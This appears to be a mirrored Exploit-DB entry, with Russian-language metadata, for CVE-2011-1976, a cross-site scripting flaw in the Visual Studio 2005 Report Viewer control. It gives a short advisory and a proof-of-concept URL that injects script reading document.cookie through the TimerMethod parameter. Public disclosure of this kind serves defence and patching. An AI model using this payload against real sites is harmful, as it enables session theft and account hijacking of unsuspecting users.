Exploit Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities

[Exploiter]

EDB-ID

36020

Проверка EDB

1. Пройдено

Автор

ADAM BIXBY

Тип уязвимости

REMOTE

Платформа

WINDOWS

CVE

cve-2011-1976

Дата публикации

2011-08-09

source: https://www.securityfocus.com/bid/49033/info

Microsoft Visual Studio is prone to multiple cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information. 

https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00TouchSession0;alert(document.cookie);//&CacheSeed=